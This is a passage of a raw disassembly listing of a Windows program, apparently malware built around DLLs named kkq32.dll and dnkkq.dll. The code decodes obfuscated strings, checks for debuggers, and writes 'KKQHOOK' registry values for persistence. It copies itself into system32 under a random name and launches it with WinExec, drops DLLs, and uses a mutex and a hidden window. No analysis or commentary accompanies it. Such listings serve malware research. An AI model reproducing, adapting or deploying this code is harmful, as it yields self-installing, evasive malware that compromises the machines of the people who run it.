lea edi, [ebp+var_600]
push edi
lea edi, [ebp+var_45C3]
push edi
push offset dword_41EAD0
call sub_4063A9
add esp, 20h
mov ebx, eax
call sub_40C218 ; GetTickCount
cmp ebx, 0
jnz short loc_409C6B
call sub_40C218 ; GetTickCount
lea eax, [ebp+var_600]
push eax
call sub_4035A9
add esp, 4
mov [ebp+var_4714], 7890h
add [ebp+var_4714], 336h
jmp short loc_409CAF
; ---------------------------------------------------------------------------
loc_409C6B: ; CODE XREF: sub_4096E4+55B�j
push 4
push 4
lea eax, [ebp+var_604]
push eax
push offset aOfstkkq ; "ofstkkq"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4015C0
mov eax, dword_4459CF
mov [ebp+var_46F8], eax
lea eax, [ebp+var_600]
push eax
call sub_4035A9
add esp, 1Ch
mov eax, dword_4459D3
mov [ebp+var_46FC], eax
loc_409CAF: ; CODE XREF: sub_4096E4+585�j
and [ebp+var_35C4], 0
mov [ebp+var_45C8], 4
call sub_40C2B4 ; IsDebuggerPresent
lea eax, [ebp+var_45D4]
push eax
lea eax, [ebp+var_45C8]
push eax
lea eax, [ebp+var_35C4]
push eax
push offset aOfstkkqc ; "ofstkkqc"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4014AA
add esp, 18h
push 0
push 0
push 4
push 0
push 0
push 80000000h
push offset dword_40DFD0
call sub_40C2FC ; CreateFileA
mov [ebp+var_45CC], eax
call sub_40C188 ; GetCurrentProcessId
push 0
push [ebp+var_45CC]
call sub_40C1A0 ; GetFileSize
mov [ebp+var_46E8], eax
push [ebp+var_45CC]
call sub_40C1DC ; CloseHandle
call sub_40C188 ; GetCurrentProcessId
mov eax, [ebp+var_46E8]
cmp [ebp+var_35C4], eax
jb short loc_409D65
mov [ebp+var_4714], 783Bh
mov eax, [ebp+var_4714]
mov edx, eax
add edx, eax
mov [ebp+var_4714], edx
jmp loc_409E90
; ---------------------------------------------------------------------------
loc_409D65: ; CODE XREF: sub_4096E4+660�j
mov eax, dword_4459D7
mov [ebp+var_4700], eax
mov eax, dword_43B094
inc eax
push eax
lea eax, [ebp+var_46D3]
push eax
call sub_401719
mov [ebp+var_46D6], 62AFh
movzx eax, [ebp+var_46D6]
imul eax, 4D6h
mov [ebp+var_46D6], ax
push 9
push offset aGmGDaa ; "Õƒ¬ÕƒÞ„€"
call sub_40129C
lea edi, [ebp+var_46D3]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_600]
push edi
call sub_40C6B0
lea edi, [ebp+var_4708]
lea esi, aBPA ; "&B /p%€"
movsd
movsd
lea eax, [ebp+var_600]
push eax
call sub_40352B
call sub_40C218 ; GetTickCount
push 1
push offset aB ; ""
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push [ebp+var_35C4]
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_600]
push edi
lea edi, [ebp+var_45C3]
push edi
push offset dword_40DFD0
call sub_4063A9
mov ebx, eax
mov [ebp+var_46DC], 63C2h
add [ebp+var_46DC], 4AD7h
lea eax, [ebp+var_600]
push eax
call sub_40C3E0 ; DeleteFileA
lea eax, [ebp+var_600]
push eax
call sub_4035A9
add esp, 50h
call sub_40C194 ; GetCurrentThreadId
or ebx, ebx
jz short loc_409E90
mov [ebp+var_4710], 0ADh
add [ebp+var_4710], 9Ah
cmp [ebp+var_604], 0
jz short loc_409E90
push 4
push 4
lea eax, [ebp+var_604]
push eax
push offset aOfstkkqc ; "ofstkkqc"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4015C0
add esp, 18h
loc_409E90: ; CODE XREF: sub_4096E4+67C�j
; sub_4096E4+771�j ...
push 0
push 80h
push 3
push 0
push 0
push 80000000h
push offset dword_413CB0
call sub_40C2FC ; CreateFileA
mov [ebp+var_45D0], eax
cmp eax, 0FFFFFFFFh
jz loc_40A383
push [ebp+var_45D0]
call sub_40C1DC ; CloseHandle
lea eax, [ebp+var_45C3]
push eax
lea eax, [ebp+var_E08]
push eax
call sub_40C6B0
mov [ebp+var_46DE], 3884h
inc [ebp+var_46DE]
push 6
push offset aFaa ; "Ï”€ÍÂ"
call sub_40129C
push eax
lea edi, [ebp+var_E08]
push edi
call sub_40C6D4
mov [ebp+var_46DF], 0EFh
movzx eax, [ebp+var_46DF]
imul eax, 56B3h
mov [ebp+var_46DF], al
lea eax, [ebp+var_600]
push eax
call sub_40352B
push 1
push offset aB ; ""
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push [ebp+var_35C4]
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_600]
push edi
lea edi, [ebp+var_E08]
push edi
push offset dword_413CB0
call sub_4063A9
mov ebx, eax
mov [ebp+var_46E2], 17CDh
movzx eax, [ebp+var_46E2]
imul eax, 7FD2h
mov [ebp+var_46E2], ax
lea eax, [ebp+var_600]
push eax
call sub_40C3E0 ; DeleteFileA
call sub_40C218 ; GetTickCount
lea eax, [ebp+var_600]
push eax
call sub_4035A9
add esp, 48h
lea edi, [ebp+var_470F]
lea esi, aEijF ; "eiJ=+f"
mov ecx, 7
rep movsb
or ebx, ebx
jz short loc_409FD3
mov word ptr [ebp+var_4714+2], 6103h
add word ptr [ebp+var_4714+2], 58EFh
push offset dword_413CB0
call sub_40C3E0 ; DeleteFileA
loc_409FD3: ; CODE XREF: sub_4096E4+495�j
; sub_4096E4+8D1�j
cmp [ebp+var_200], 3Ah
jnz loc_40A1B7
cmp [ebp+var_1FD], 3Ah
jnz loc_40A1B7
mov [ebp+var_35C8], 2DB0h
add [ebp+var_35C8], 3D7h
mov [ebp+var_35C9], 83h
sub [ebp+var_35C9], 50h
mov [ebp+var_1FD], 0
push 5
push offset aE_1 ; "ÊÕÀÂ…"
call sub_40129C
lea edi, [ebp+var_35C4]
push edi
push eax
lea edi, [ebp+var_200]
push edi
call sub_40C6C8
add esp, 14h
call sub_40C2B4 ; IsDebuggerPresent
cmp [ebp+var_35C4], 0
jz short loc_40A070
call sub_40C698
mov edx, 621B97C3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
inc edi
cmp edi, [ebp+var_35C4]
ja loc_40A335
loc_40A070: ; CODE XREF: sub_4096E4+961�j
cmp ds:dword_418380, 2
jnz short loc_40A0DC
mov [ebp+var_35D8], 4729h
sub [ebp+var_35D8], 5564h
push 400h
lea eax, [ebp+var_600]
push eax
call sub_40C200 ; GetSystemDirectoryA
push 0Ah
push offset aGmuafAsc ; "Õƒ¬“”Þ€™–"
call sub_40129C
lea edi, [ebp+var_600]
push edi
push eax
lea edi, [ebp+var_100F]
push edi
call sub_40C6B0
push 8
push offset aMuafXix ; "¬“”Þ•ˆ•"
call sub_40129C
push eax
lea edi, [ebp+var_600]
push edi
call sub_40C6D4
add esp, 24h
jmp short loc_40A154
; ---------------------------------------------------------------------------
loc_40A0DC: ; CODE XREF: sub_4096E4+993�j
call sub_40C188 ; GetCurrentProcessId
push 400h
lea eax, [ebp+var_600]
push eax
call sub_40C248 ; GetWindowsDirectoryA
push 0Eh
push offset aGmuqaasufAsc ; "Õƒ¬“Ÿ‘ž”Þ€™–"
call sub_40129C
lea edi, [ebp+var_600]
push edi
push eax
lea edi, [ebp+var_100F]
push edi
call sub_40C6B0
call sub_40C2B4 ; IsDebuggerPresent
push 0Ch
push offset aMuqaasufUqa ; "¬“Ÿ‘ž”Þ“Ÿ"
call sub_40129C
push eax
lea edi, [ebp+var_600]
push edi
call sub_40C6D4
add esp, 24h
mov [ebp+var_35D8], 20B4h
mov eax, 7569h
mul [ebp+var_35D8]
mov [ebp+var_35DC], eax
mov [ebp+var_35D8], eax
loc_40A154: ; CODE XREF: sub_4096E4+9F6�j
lea eax, [ebp+var_100F]
push eax
call sub_40C3E0 ; DeleteFileA
lea edi, [ebp+var_35D2]
lea esi, a2qZg8 ; "2q %ZG8"
movsd
movsd
push 8
push offset aGG_0 ; "ÕƒÐß³ÐÕƒ"
call sub_40129C
lea edi, [ebp+var_200]
add edi, 4
push edi
lea edi, [ebp+var_600]
push edi
push eax
lea edi, [ebp+var_600]
push edi
call sub_40C6B0
add esp, 18h
push 0
lea eax, [ebp+var_600]
push eax
call sub_40C3A4 ; WinExec
mov [ebp+var_35CA], 57h
add [ebp+var_35CA], 1
loc_40A1B7: ; CODE XREF: sub_4096E4+8F6�j
; sub_4096E4+903�j
push 5
push offset aZeaf ; "‡…€”Ð"
call sub_40129C
mov edi, 8
sub edi, dword_43B094
push edi
push eax
lea edi, [ebp+var_200]
push edi
call sub_40181E
add esp, 14h
or eax, eax
jnz loc_40A335
call sub_40C218 ; GetTickCount
lea edi, [ebp+var_55C5]
lea esi, aMZ4 ; "%,m z4"
mov ecx, 7
rep movsb
mov ax, word_4459F9
mov [ebp+var_55C8+1], ax
mov eax, 0Eh
sub eax, dword_43B094
push eax
lea eax, [ebp+var_F0B]
push eax
call sub_401719
mov ax, word_4459FB
mov [ebp+var_55CA+1], ax
push 9
push offset aGmGFsd ; "Õƒ¬ÕƒÞ”‘„"
call sub_40129C
lea edi, [ebp+var_F0B]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_45BF]
push edi
call sub_40C6B0
call sub_40C2B4 ; IsDebuggerPresent
lea edi, [ebp+var_55CF]
lea esi, aJzft ; " jzFt"
mov ecx, 3
rep movsw
lea eax, [ebp+var_1FB]
push eax
lea eax, [ebp+var_55BE]
push eax
call sub_40C138
push 3
push offset aIf ; "ˆ”Â"
call sub_40129C
mov [ebp+var_55DC], eax
push 1
push offset aB ; ""
call sub_40129C
push 0
push 0
push 0
push eax
mov edi, [ebp+var_55DC]
push edi
lea edi, [ebp+var_45BF]
push edi
lea edi, [ebp+var_55BE]
push edi
push 0
call sub_4063A9
add esp, 50h
mov ebx, eax
lea edi, [ebp+var_55D5]
lea esi, aEGry ; "E=GrY"
mov ecx, 3
rep movsw
cmp ebx, 2
jnz short loc_40A335
call sub_40C1F4 ; GetProcessHeap
push 0
lea eax, [ebp+var_45BF]
push eax
call sub_40C3A4 ; WinExec
push 6
push offset aUxzjxv ; "ž•‡†•‚"
call sub_40129C
mov edi, 13h
sub edi, dword_43B098
push edi
push eax
lea edi, [ebp+var_55BE]
push edi
call sub_40181E
add esp, 14h
cmp eax, 0FFFFh
jz short loc_40A335
mov eax, 13h
sub eax, dword_43B098
push eax
call sub_40C65C
pop ecx
loc_40A335: ; CODE XREF: sub_4096E4+372�j
; sub_4096E4+389�j ...
lea eax, [ebp+var_200]
push eax
push [ebp+var_608]
push [ebp+var_E0C]
call sub_401C5D
add esp, 0Ch
mov [ebp+var_608], eax
or eax, eax
jnz loc_409A5B
push [ebp+var_E0C]
call sub_40C2D8 ; LocalFree
mov [ebp+var_1019], 94h
movzx eax, [ebp+var_1019]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1019], al
loc_40A383: ; CODE XREF: sub_4096E4+2B2�j
; sub_4096E4+32C�j ...
fld dbl_445C04
fimul dword_43B0B0
mov edi, eax
call sub_40C090
xchg eax, edi
push edi
call sub_40C650
mov edi, dword_43B0B4
sub edi, eax
inc edi
mov [ebp+var_1014], edi
call sub_40C224 ; GetVersion
mov eax, edi
mov [ebp-15BCh], eax
push eax
call sub_40C650
add esp, 8
mov edi, [ebp-15BCh]
add edi, eax
mov [ebp+var_1014], edi
mov eax, edi
mov edi, dword_43B0B4
sub edi, dword_43B0B0
mov ecx, edi
inc ecx
xor edx, edx
div ecx
mov [ebp+var_15C0], eax
mov [ebp+var_1014], eax
call sub_40C218 ; GetTickCount
call sub_40C698
mov [ebp+var_15C4], eax
mov eax, dword_43B0B0
mov edx, 66666667h
push ecx
mov ecx, eax
imul edx
sar edx, 1
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
lea edi, [eax+eax*4]
mov esi, [ebp+var_1014]
mov edx, [ebp+var_15C4]
mov eax, esi
imul eax, [ebp+var_15C4]
mov ecx, 0Ah
cdq
idiv ecx
lea edi, [edi+edx+5]
mov dword_43B0B0, edi
mov ax, word_445A09
mov [ebp+var_115F], ax
mov eax, dword_43B0B4
cmp edi, eax
jbe short loc_40A461
and dword_43B0B0, 0
loc_40A461: ; CODE XREF: sub_4096E4+D74�j
call sub_40C1F4 ; GetProcessHeap
push 493E0h
call sub_40C638
pop ecx
call sub_40C1B8 ; RtlGetLastWin32Error
jmp loc_40975C
sub_4096E4 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A482 proc near ; CODE XREF: sub_40A4E2+16�p
var_10 = dword ptr -10h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push edi
call sub_40C1B8 ; RtlGetLastWin32Error
mov eax, dword_445A0B
mov [ebp+var_8], eax
push offset aKkqhook_28 ; "KKQHOOK_28"
push 0
push 1F0001h
call sub_40C2E4 ; OpenMutexA
mov [ebp+var_4], eax
or eax, eax
jz short loc_40A4DF
call sub_40C1B8 ; RtlGetLastWin32Error
push [ebp+var_4]
call sub_40C1DC ; CloseHandle
mov [ebp+var_9], 0D9h
add [ebp+var_9], 86h
mov eax, 13h
sub eax, dword_43B098
push eax
call sub_40C65C
pop ecx
mov [ebp+var_10], 15A8h
inc [ebp+var_10]
loc_40A4DF: ; CODE XREF: sub_40A482+2A�j
pop edi
leave
retn
sub_40A482 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A4E2 proc near ; CODE XREF: sub_40C0B4+5C�p
var_7B9 = byte ptr -7B9h
var_7B8 = dword ptr -7B8h
var_7B4 = byte ptr -7B4h
var_7B0 = byte ptr -7B0h
var_7AB = byte ptr -7ABh
var_7A8 = byte ptr -7A8h
var_7A3 = byte ptr -7A3h
var_7A0 = byte ptr -7A0h
var_79A = byte ptr -79Ah
var_799 = byte ptr -799h
var_791 = byte ptr -791h
var_78C = word ptr -78Ch
var_78A = byte ptr -78Ah
var_784 = byte ptr -784h
var_77D = dword ptr -77Dh
var_779 = byte ptr -779h
var_774 = byte ptr -774h
var_76D = byte ptr -76Dh
var_766 = byte ptr -766h
var_667 = byte ptr -667h
var_568 = byte ptr -568h
var_464 = dword ptr -464h
var_460 = dword ptr -460h
var_45C = byte ptr -45Ch
var_358 = dword ptr -358h
var_352 = word ptr -352h
var_350 = dword ptr -350h
var_34C = dword ptr -34Ch
var_348 = dword ptr -348h
var_344 = byte ptr -344h
var_2E0 = byte ptr -2E0h
var_27C = dword ptr -27Ch
var_276 = word ptr -276h
var_274 = byte ptr -274h
var_273 = byte ptr -273h
var_272 = word ptr -272h
var_270 = byte ptr -270h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = byte ptr -164h
var_60 = word ptr -60h
var_5D = byte ptr -5Dh
var_5C = dword ptr -5Ch
var_55 = dword ptr -55h
var_51 = dword ptr -51h
var_4D = dword ptr -4Dh
var_49 = dword ptr -49h
var_45 = dword ptr -45h
var_41 = dword ptr -41h
var_3D = dword ptr -3Dh
var_39 = dword ptr -39h
var_35 = dword ptr -35h
var_31 = dword ptr -31h
var_2D = byte ptr -2Dh
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_1D = byte ptr -1Dh
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 7BCh
push ebx
push esi
push edi
mov [ebp+var_60], 7665h
inc [ebp+var_60]
call sub_40A482
lea edi, [ebp+var_76D]
lea esi, aCQtV ; "C-qT~V"
mov ecx, 7
rep movsb
push 104h
lea eax, [ebp+var_164]
push eax
call sub_40C200 ; GetSystemDirectoryA
lea edi, [ebp+var_774]
lea esi, aD9u5 ; "d 9u5"
mov ecx, 7
rep movsb
push 13h
push offset aMfvsjxvgmufsgv ; "¬”‚™†•‚ƒ¬ž”™ƒ‚”Þƒ‰ƒ"
call sub_40129C
push eax
lea edi, [ebp+var_164]
push edi
call sub_40C6D4
add esp, 10h
call sub_40C224 ; GetVersion
push 0
push 0
push 3
push 0
push 0
push 80000001h
lea eax, [ebp+var_164]
push eax
call sub_40C2FC ; CreateFileA
mov [ebp+var_358], eax
cmp eax, 0FFFFFFFFh
jnz short loc_40A582
call sub_4085C0
jmp short loc_40A58D
; ---------------------------------------------------------------------------
loc_40A582: ; CODE XREF: sub_40A4E2+97�j
push [ebp+var_358]
call sub_40C1DC ; CloseHandle
loc_40A58D: ; CODE XREF: sub_40A4E2+9E�j
mov [ebp+var_168], 3F29h
add [ebp+var_168], 61B7h
push 9
push offset aXustXfgc ; "•ž‘’œ•”ƒ–"
call sub_40129C
push eax
call sub_40C254 ; GlobalAddAtomA
call sub_40C188 ; GetCurrentProcessId
mov eax, [ebp+arg_0]
mov ds:dword_41D928, eax
mov ds:dword_418370, 94h
lea edi, [ebp+var_779]
lea esi, aSgl ; "+SƒL"
mov ecx, 5
rep movsb
push offset dword_418370
call sub_40C230 ; GetVersionExA
call sub_40C1F4 ; GetProcessHeap
push 0FFh
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
call sub_40C200 ; GetSystemDirectoryA
call sub_40C1B8 ; RtlGetLastWin32Error
call sub_40C218 ; GetTickCount
push eax
call sub_40C6BC
call sub_40C2B4 ; IsDebuggerPresent
mov eax, dword_445A22
mov [ebp+var_77D], eax
push 104h
lea eax, [ebp+var_45C]
push eax
push [ebp+arg_0]
call sub_40C1C4 ; GetModuleFileNameA
and [ebp+var_5C], 0
mov [ebp+var_460], 4
mov [ebp+var_16C], 1856h
inc [ebp+var_16C]
lea eax, [ebp+var_784]
push eax
lea eax, [ebp+var_460]
push eax
lea eax, [ebp+var_5C]
push eax
push offset aKkqhook ; "KKQHOOK"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4014AA
add esp, 24h
mov [ebp+var_464], eax
call sub_40C194 ; GetCurrentThreadId
cmp [ebp+var_464], 0
jz short loc_40A6D0
call sub_40C218 ; GetTickCount
cmp [ebp+var_5C], 1Ch
jbe short loc_40A6A7
mov eax, 13h
sub eax, dword_43B098
push eax
call sub_40C65C
pop ecx
loc_40A6A7: ; CODE XREF: sub_40A4E2+1B1�j
mov [ebp+var_7B8], 6BD5h
mov eax, [ebp+var_7B8]
mov edx, eax
add edx, eax
mov [ebp+var_7B8], edx
cmp [ebp+var_5C], 1Ch
jz loc_40A848
call sub_40C2B4 ; IsDebuggerPresent
loc_40A6D0: ; CODE XREF: sub_40A4E2+1A6�j
lea edi, [ebp+var_78A]
lea esi, aVSl ; "!‚*SL"
mov ecx, 3
rep movsw
mov ax, word_445A2C
mov [ebp+var_78C], ax
call sub_40C698
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 41h
mov edx, edi
mov [ebp+var_2D], dl
mov [ebp+var_1], 1
jmp short loc_40A748
; ---------------------------------------------------------------------------
loc_40A71B: ; CODE XREF: sub_40A4E2+26B�j
call sub_40C698
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [ebp+edi+var_2D], dl
add [ebp+var_1], 1
loc_40A748: ; CODE XREF: sub_40A4E2+237�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_40A71B
lea edi, [ebp+var_791]
lea esi, aRL ; "&R:L"
mov ecx, 5
rep movsb
mov [ebp+var_25], 0
call sub_40C698
mov edx, eax
test dl, 1
jnz short loc_40A78F
call sub_40C1B8 ; RtlGetLastWin32Error
mov [ebp+var_27], 33h
mov [ebp+var_7B8], 1E41h
inc [ebp+var_7B8]
mov [ebp+var_26], 32h
loc_40A78F: ; CODE XREF: sub_40A4E2+28E�j
push 9
push offset aGmGXix ; "Õƒ¬ÕƒÞ•ˆ•"
call sub_40129C
lea edi, [ebp+var_2D]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_270]
push edi
call sub_40C6B0
push 0
lea eax, [ebp+var_270]
push eax
lea eax, [ebp+var_45C]
push eax
call sub_40C284 ; CopyFileA
call sub_40C188 ; GetCurrentProcessId
lea eax, [ebp+var_2D]
push eax
call sub_403D6F
lea edi, [ebp+var_799]
lea esi, a82q0vu ; "82Q0vu "
movsd
movsd
mov [ebp+var_5C], 1Ch
push 4
push 4
lea eax, [ebp+var_5C]
push eax
push offset aKkqhook ; "KKQHOOK"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4015C0
add esp, 34h
push 0
lea eax, [ebp+var_270]
push eax
call sub_40C3A4 ; WinExec
mov [ebp+var_272], 2CCAh
sub [ebp+var_272], 6825h
call sub_4042A4
call sub_40C224 ; GetVersion
mov eax, 13h
sub eax, dword_43B098
push eax
call sub_40C164 ; ExitProcess
call sub_40C1B8 ; RtlGetLastWin32Error
loc_40A848: ; CODE XREF: sub_40A4E2+1E3�j
push 5
push offset aGmG ; "Õƒ¬Õƒ"
call sub_40129C
push offset aKkq32_dll ; "kkq32.dll"
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
push offset dword_41EAD0
call sub_40C6B0
call sub_40C194 ; GetCurrentThreadId
push 5
push offset aGmG ; "Õƒ¬Õƒ"
call sub_40129C
push offset aDnkkq_dll ; "dnkkq.dll"
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
push offset dword_40F1F0
call sub_40C6B0
push 5
push offset aGmG ; "Õƒ¬Õƒ"
call sub_40129C
push offset aDatkkq32_dll ; "datkkq32.dll"
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
push offset dword_40DFD0
call sub_40C6B0
lea edi, [ebp+var_79A]
lea esi, byte_445A3B
xor ecx, ecx
inc ecx
rep movsb
push 0FFh
push offset dword_413CB0
call sub_40C248 ; GetWindowsDirectoryA
lea edi, [ebp+var_7A0]
lea esi, aDsh_i ; "DSH.i"
mov ecx, 3
rep movsw
push 9
push offset aMtqqdGig ; "¬’ŸŸ„Þƒ‰ƒ"
call sub_40129C
push eax
push offset dword_413CB0
call sub_40C6D4
call sub_40C2B4 ; IsDebuggerPresent
lea eax, aKkqhook ; "KKQHOOK"
mov [ebp+var_31], eax
mov [ebp+var_273], 82h
movzx eax, [ebp+var_273]
imul eax, 3CB4h
mov [ebp+var_273], al
mov eax, ds:dword_41D928
mov [ebp+var_45], eax
lea eax, sub_40ADF7
mov [ebp+var_51], eax
push 7F00h
push 0
call sub_40C440 ; LoadCursorA
mov [ebp+var_3D], eax
lea edi, [ebp+var_7A3]
lea esi, aX_ ; "X."
mov ecx, 3
rep movsb
push 7F03h
push 0
call sub_40C44C ; LoadIconA
mov [ebp+var_41], eax
and [ebp+var_35], 0
push 0
call sub_40C548 ; GetStockObject
mov [ebp+var_39], eax
mov [ebp+var_55], 3
and [ebp+var_4D], 0
and [ebp+var_49], 0
lea eax, [ebp+var_55]
push eax
call sub_40C464 ; RegisterClassA
call sub_40C188 ; GetCurrentProcessId
push 0
push ds:dword_41D928
push 0
push 0
push 0
push 0
push 0
push 0
push 0CA0000h
push offset aKkqhook ; "KKQHOOK"
push offset aKkqhook ; "KKQHOOK"
push 0
call sub_40C50C ; CreateWindowExA
mov ds:dword_41B7D0, eax
call sub_40C188 ; GetCurrentProcessId
push offset aKkqhook_28 ; "KKQHOOK_28"
push 0
push 0
call sub_40C344 ; CreateMutexA
lea edi, [ebp+var_7A8]
lea esi, aGp ; "%gp&"
mov ecx, 5
rep movsb
push 2
call sub_402B12
add esp, 5Ch
mov [ebp+var_274], 0C8h
movzx eax, [ebp+var_274]
imul eax, 783h
mov [ebp+var_274], al
call sub_40C224 ; GetVersion
cmp eax, 80000000h
jb short loc_40AA6E
lea edi, [ebp+var_7B9]
lea esi, byte_445A4A
xor ecx, ecx
inc ecx
rep movsb
push 0Ch
push offset aIxvuxF ; "›•‚ž•œÃÂÞ”œœ"
call sub_40129C
push eax
call sub_40C1D0 ; GetModuleHandleA
mov edi, eax
push 16h
push offset aVxcsgdxvgxvjsu ; "¢•—™ƒ„•‚£•‚†™“• ‚Ÿ“•ƒƒ"
call sub_40129C
add esp, 10h
push eax
push edi
call sub_40C1E8 ; GetProcAddress
mov [ebp+var_7B8], eax
call sub_40C188 ; GetCurrentProcessId
mov edi, 13h
sub edi, dword_43B098
push edi
push eax
call [ebp+var_7B8]
loc_40AA6E: ; CODE XREF: sub_40A4E2+531�j
lea edi, [ebp+var_7AB]
lea esi, aF ; " F"
mov ecx, 3
rep movsb
push 104h
lea eax, [ebp+var_568]
push eax
push 0
call sub_40C1C4 ; GetModuleFileNameA
lea eax, [ebp+var_568]
push eax
call sub_40352B
mov [ebp+var_276], 2E77h
movzx eax, [ebp+var_276]
imul eax, 7ED2h
mov [ebp+var_276], ax
push offset dword_41EAD0
call sub_40352B
mov [ebp+var_27C], 17Ah
add [ebp+var_27C], 7251h
push offset dword_40F1F0
call sub_40352B
push offset dword_40DFD0
call sub_40352B
call sub_40C2B4 ; IsDebuggerPresent
call sub_40C188 ; GetCurrentProcessId
push eax
call sub_4037D7
lea eax, [ebp+var_2E0]
push eax
call sub_403AC7
call sub_40C2B4 ; IsDebuggerPresent
and [ebp+var_348], 0
mov [ebp+var_34C], 64h
mov [ebp+var_350], 5178h
inc [ebp+var_350]
push 45h
push offset aGqcdzsvxmSuv_0 ; "£Ÿ–„‡‘‚•¬½™“‚ŸƒŸ–„¬§™ž”Ÿ‡ƒ¬³…‚‚•ž„¦•‚ƒ™"...
call sub_40129C
lea edi, [ebp+var_348]
push edi
lea edi, [ebp+var_34C]
push edi
lea edi, [ebp+var_344]
push edi
lea edi, [ebp+var_2E0]
push edi
push eax
push 80000002h
call sub_4014AA
push 1
push offset asc_445B3F ; "»"
call sub_40129C
push eax
lea edi, [ebp+var_344]
push edi
call sub_4038D6
lea edi, [ebp+var_7B0]
lea esi, aO?gv ; "O?g‚"
mov ecx, 5
rep movsb
push 1
push offset aJ ; "¦"
call sub_40129C
push eax
lea edi, [ebp+var_2E0]
push edi
call sub_4038D6
call sub_40C1B8 ; RtlGetLastWin32Error
push 17h
push offset aGMGmUavqugxvjx ; "³¼£¹´¬Õƒ¬¹ž ‚Ÿ“£•‚†•‚ÃÂ"
call sub_40129C
lea edi, [ebp+var_344]
push edi
push eax
lea edi, [ebp+var_766]
push edi
call sub_40C6B0
lea eax, [ebp+var_348]
push eax
lea eax, [ebp+var_34C]
push eax
lea eax, [ebp+var_667]
push eax
push 0
lea eax, [ebp+var_766]
push eax
push 80000000h
call sub_4014AA
mov [ebp+var_5D], 5Eh
movzx eax, [ebp+var_5D]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5D], al
lea eax, [ebp+var_667]
push eax
call sub_40352B
call sub_40C1F4 ; GetProcessHeap
call sub_403BAD
mov [ebp+var_352], 748Ah
inc [ebp+var_352]
push offset sub_4081B0
call sub_408043
add esp, 8Ch
mov ebx, 641Ch
mov eax, ebx
add eax, ebx
mov ebx, eax
lea eax, [ebp+var_7B4]
push eax
push 0
push 0
push offset sub_4096E4
push 0
push 0
call sub_40C3D4 ; CreateThread
push eax
call sub_40C1DC ; CloseHandle
call sub_40C218 ; GetTickCount
push 0
mov eax, dword_43B094
add eax, 1EDh
push eax
mov eax, 13h
sub eax, dword_43B098
push eax
push ds:dword_41B7D0
call sub_40C458 ; SetTimer
jmp short loc_40ACBB
; ---------------------------------------------------------------------------
loc_40AC92: ; CODE XREF: sub_40A4E2+7EA�j
mov ax, word_445A53
mov word ptr [ebp+var_7B8+2], ax
lea eax, [ebp+var_1D]
push eax
call sub_40C4C4 ; TranslateMessage
call sub_40C224 ; GetVersion
lea eax, [ebp+var_1D]
push eax
call sub_40C4D0 ; DispatchMessageA
call sub_40C218 ; GetTickCount
loc_40ACBB: ; CODE XREF: sub_40A4E2+7AE�j
push 0
push 0
push 0
lea eax, [ebp+var_1D]
push eax
call sub_40C47C ; GetMessageA
or eax, eax
jnz short loc_40AC92
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40A4E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ACD5 proc near ; DATA XREF: sub_408C98+95D�o
; sub_408C98+98F�o ...
var_18 = byte ptr -18h
var_12 = word ptr -12h
var_9 = byte ptr -9
var_8 = word ptr -8
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C1B8 ; RtlGetLastWin32Error
mov eax, [ebp+arg_4]
cmp eax, 100h
jz short loc_40ACF7
jmp short loc_40AD66
; ---------------------------------------------------------------------------
call sub_40C224 ; GetVersion
loc_40ACF7: ; CODE XREF: sub_40ACD5+19�j
cmp [ebp+arg_8], 9
jnz short loc_40AD66
cmp ebx, ds:dword_41076C
jnz short loc_40AD10
push ds:dword_431E90
call sub_40C428 ; SetFocus
loc_40AD10: ; CODE XREF: sub_40ACD5+2E�j
lea edi, [ebp+var_18]
lea esi, aLwld ; "lwld%"
mov ecx, 3
rep movsw
cmp ebx, ds:dword_431E90
jnz short loc_40AD34
push ds:dword_41D920
